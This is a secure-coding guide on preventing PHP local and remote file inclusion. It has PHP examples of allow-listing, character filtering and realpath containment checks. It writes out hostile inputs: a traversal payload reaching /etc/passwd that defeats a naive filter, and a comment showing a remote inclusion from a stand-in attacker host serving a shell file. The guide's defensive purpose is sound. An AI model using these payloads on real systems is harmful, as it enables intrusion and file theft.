A local or remote file inclusion vulnerability exists when user input is passed, without proper validation, to PHP functions such as include, include_once, require, require_once, fopen or readfile. Never build the path for these functions from a variable the user can manipulate. The following code example shows one way to validate user input securely.
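The following is an added example, not code from the original page. It puts the vulnerable pattern next to the two defences discussed here and in the next paragraph: a hardcoded allow-list of includable files and, where names must stay dynamic, a character filter. The pages/ directory, its file names and the "page" request parameter are assumptions.

```php
<?php
// Added example, not the original page's code. The pages/ directory,
// the file names and the "page" parameter are assumptions.

declare(strict_types=1);

// VULNERABLE: the user controls the path handed to include().
// ?page=../../../../etc/passwd reads a local file; with allow_url_include=On,
// ?page=http://attacker.example/shell.txt pulls in remote code.
function includeVulnerable(string $page): void
{
    include 'pages/' . $page;
}

// SAFE 1: hardcode every includable file; the user value is only a lookup
// key and never becomes part of the path.
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolveFromAllowList(string $page): ?string
{
    return ALLOWED_PAGES[$page] ?? null;   // unknown key: reject
}

// SAFE 2: if names must stay dynamic, accept only the characters a name
// needs. Dots, slashes, backslashes, colons and NUL never pass, so neither
// ".." nor a URL scheme can be built. The extension is appended by the code,
// not supplied by the user.
function resolveFromCharacterFilter(string $page): ?string
{
    if (preg_match('/^[a-z0-9_]{1,32}$/', $page) !== 1) {
        return null;
    }
    $file = __DIR__ . '/pages/' . $page . '.php';
    return is_file($file) ? $file : null;
}

$page = $_GET['page'] ?? 'home';

// Prefer the allow-list; use the character filter only where an allow-list
// is genuinely impractical.
$file = resolveFromAllowList($page);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
require __DIR__ . '/pages/' . $file;
```

The allow-list version is preferable because the request value never touches the filesystem: it selects an entry from a map the developer wrote, and anything else is a 404. The character filter is a fallback for genuinely dynamic names; it works because the regular expression makes path separators, dots and scheme prefixes impossible to express, not because it tries to strip them out afterwards.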
The best way to avoid this vulnerability is to hardcode every file you need to include, as the example above suggests. If you really need to include files dynamically, allow only the characters a file name actually needs and reject everything else, in particular ".", "/" and "\". An even better solution is to maintain a whitelist of files that may be included; any other file the user requests is simply rejected.
Note: If you implement your own filters and pass the filtered input straight to the include functions, make sure the filters cannot be bypassed, for example by URL-encoding or double-encoding the input, by nesting the forbidden sequence so that a single removal pass reassembles it ("....//" turns into "../" once "../" is stripped), or, on PHP versions before 5.3.4, by appending a null byte that truncated the path.
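An added example (not from the original page) of the filter bypass the note warns about: a home-made "remove ../" filter, the constructed input that defeats it, and a containment check that does not rely on sanitising at all. The payload and the pages/ directory are constructed for illustration.

```php
<?php
// Added example, not the original page's code. The payload and the
// pages/ directory are constructed for illustration.

declare(strict_types=1);

// Naive filter: strip "../" once. This is the kind of code the note warns about.
function stripTraversalOnce(string $path): string
{
    return str_replace('../', '', $path);
}

// Better but still fragile: repeat until nothing changes, covering both
// separators. It still assumes no later layer decodes the string again.
function stripTraversalRepeatedly(string $path): string
{
    do {
        $before = $path;
        $path = str_replace(['../', '..\\'], '', $path);
    } while ($path !== $before);
    return $path;
}

// Robust alternative: do not sanitise, resolve the final path and check that
// it lies inside the intended directory. realpath() collapses ".." and
// symlinks and returns false for files that do not exist.
function isInsideDirectory(string $candidate, string $baseDir): bool
{
    $base = realpath($baseDir);
    $real = realpath($candidate);
    if ($base === false || $real === false) {
        return false;
    }
    return strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0;
}

$payload = '....//....//....//etc/passwd';

// One removal pass deletes the middle "../" of each "....//" group and the
// surrounding characters close up into a fresh "../", so the traversal survives.
$once = stripTraversalOnce($payload);

// Looping removes the reassembled sequences as well and leaves a relative name.
$looped = stripTraversalRepeatedly($payload);

printf("single pass : %s\n", $once);
printf("looped      : %s\n", $looped);
var_dump(isInsideDirectory(__DIR__ . '/pages/' . $once, __DIR__ . '/pages'));
```

The lesson is that blacklisting sequences is a losing game: every removal rule creates a new way to encode the forbidden input. Deciding from the resolved path, as isInsideDirectory() does, or from an allow-list of known files, avoids the problem because the attacker's string is never trusted to be "clean".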
Avoid Remote File Inclusion
If you do not need to include remote files, set "allow_url_include = Off" in your php.ini to disable inclusion of remote files. This is the default, and the directive has been deprecated since PHP 7.4. It only takes effect when "allow_url_fopen" is On; if your application does not need URL wrappers at all, set "allow_url_fopen = Off" as well so that fopen, file_get_contents and similar functions also refuse remote URLs.
For more information visit https://crashtest-security.com